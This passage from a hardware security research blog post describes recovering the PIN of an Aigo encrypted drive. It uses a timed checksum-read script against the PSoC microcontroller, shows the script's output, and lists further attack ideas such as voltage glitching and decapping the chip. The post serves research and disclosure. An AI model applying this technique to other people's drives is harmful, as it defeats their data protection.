  # delays (in us) covering the PIN bytes of block 126 on my PSoC
  for delay in range(145495, 145719, 16):
    csum = csum_at(delay, 1)            # checksum read back after `delay` us
    byte = (csum-last_csum)&0xFF        # difference with the previous sample = the flash byte
    print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
    pin_bytes.append(byte)
    last_csum = csum
  print "PIN: ",
  for i in range(0, len(pin_bytes)):
    if pin_bytes[i] in pin_map:
      print pin_map[pin_bytes[i]],
  print

Here is the output of running it:

$ ./psoc.py 
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9

Woohoo! It works!

Note that the delay values I used are specific to a single PSoC, the one I worked with.

8. What's next?

So, let's summarize the PSoC part of our Aigo drive adventure:

  • we can read the SRAM even though it is read-protected;
  • we can bypass the read protection with a cold boot trace and read the PIN code directly.

However, our attack has some flaws due to timing problems. It could be improved as follows:

  • write a tool that correctly decodes the dump obtained with the "cold boot trace" attack;
  • use an FPGA to generate the time delays (or use the Arduino's hardware timer);
  • try another attack: deliberately enter a wrong PIN, reset and dump the RAM, hoping that the correct PIN is kept in RAM for the comparison. However, this is not easy to do with an Arduino, since the Arduino's signal level is 5 V while the board under study works at 3.3 V.

Another interesting thing to try would be to play with the voltage level to bypass the read protection. If that approach worked, we could get exact data out of the flash instead of relying on checksum reads at timed delays.

Since the SROM probably reads the protection bits through the ReadBlock syscall, we could do what is described on Dmitry Nedospasov's blog: a reimplementation of Chris Gerlinski's attack, presented at REcon Brussels 2017.

Another interesting thing to do would be to decap the chip: take an SRAM dump, and identify undocumented syscalls and vulnerabilities.

9. Conclusion

So the security of this drive leaves a lot to be desired, since it uses an ordinary (not "hardened") microcontroller to store the PIN code... Also, I have not (yet) looked at how data encryption is implemented on this device!

What could be recommended to Aigo? After analyzing several models of encrypted HDD drives, I gave a talk at SyScan in 2015 reviewing the security problems of several external HDD drives and making recommendations on what could be improved. 🙂

I spent two weekends and a few evenings on this research. About 40 hours in total, counting from the very beginning (when I opened the disk) to the end (dumping the PIN code). Those 40 hours also include the time spent writing this article. It was a very exciting journey.

Source: www.habr.com
